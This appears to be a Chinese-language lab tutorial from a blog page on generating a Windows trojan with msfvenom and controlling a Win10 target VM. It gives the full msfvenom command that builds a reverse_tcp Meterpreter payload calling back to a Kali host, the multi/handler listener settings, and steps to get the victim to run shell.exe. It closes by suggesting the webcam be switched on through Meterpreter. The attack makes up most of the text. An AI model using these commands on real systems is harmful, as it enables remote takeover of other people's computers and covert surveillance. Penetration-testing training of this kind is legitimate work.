msfvenom生成木马之控制靶机

简介: msfvenom生成木马之控制靶机

1、简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。

2、实验环境

1、一台kali虚拟机  ip为192.168.110.140

2、一台win10虚拟机

3、实验步骤

1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe

640.png

2、把刚刚生成的exe木马文件传输到我们的win10靶机上

3、在kali上输入msfconsole打开metasploit

640.png

4、metasploit配置及监听

1. use exploit/multi/handler  #加载模块
2. 
3. set payload windows/meterpreter/reverse_tcp  #修改成我们之前生成木马时使用的payload
4. 
5. set lhost 192.168.110.140  #设置kali的IP地址为监听地址
6. 
7. set lport 4444  #设置监听端口

640.png

以上配置全部配置完成后我们就可以输入run然后开始监听了

640.png

监听好后我们就可以用win10靶机点击我们的木马程序

点击后就连接上我们的kali攻击机了

640.png

之后我们就可以利用metetpreter这个后渗透模块干一些骚操作了

如用webcam打开摄像头等!


目录
相关文章
|
Java 关系型数据库 MySQL
高校宿舍报修管理系统的设计与实现(论文+源码)_kaic
高校宿舍报修管理系统的设计与实现(论文+源码)_kaic
|
4月前
|
Web App开发 Linux Android开发
实战爬取某小说网站内容 -自带源码
爬去某小说网站,生成并下载下来
177 0
|
4月前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
714 79
web渗透-文件包含漏洞
|
4月前
|
消息中间件 缓存 监控
中间件架构设计与实践:构建高性能分布式系统的核心基石
摘要 本文系统探讨了中间件技术及其在分布式系统中的核心价值。作者首先定义了中间件作为连接系统组件的"神经网络",强调其在数据传输、系统稳定性和扩展性中的关键作用。随后详细分类了中间件体系,包括通信中间件(如RabbitMQ/Kafka)、数据中间件(如Redis/MyCAT)等类型。文章重点剖析了消息中间件的实现机制,通过Spring Boot代码示例展示了消息生产者的完整实现,涵盖消息ID生成、持久化、批量发送及重试机制等关键技术点。最后,作者指出中间件架构设计对系统性能的决定性影响,
|
网络协议 Linux 网络安全
NMAP扫描基本操作
NMAP扫描基本操作
745 5
使用OpenDaylight界面下发流表(下)
使用OpenDaylight界面下发流表(下)
533 0
|
设计模式 前端开发 JavaScript
webpack实战之手写一个loader和plugin
该文章详细讲解了如何从零开始编写一个自定义的Webpack Loader和Plugin,包括它们的工作原理、开发步骤以及如何将自定义的Loader和Plugin集成到Webpack配置中。
webpack实战之手写一个loader和plugin
字节流与字符流的差异
【10月更文挑战第13天】总的来说,字节流和字符流各有其特点和适用范围,我们需要根据具体的需求来选择使用哪种类型的流。在实际应用中,还需要注意编码问题、性能优化等方面,以确保数据的正确处理和高效传输。
|
存储 Java
Java中的布尔型数据(Boolean)
Java中的布尔型数据(Boolean)
1539 0
|
安全 数据可视化 网络协议
情报收集神器:Maltego 保姆级教程(附链接)
情报收集神器:Maltego 保姆级教程(附链接)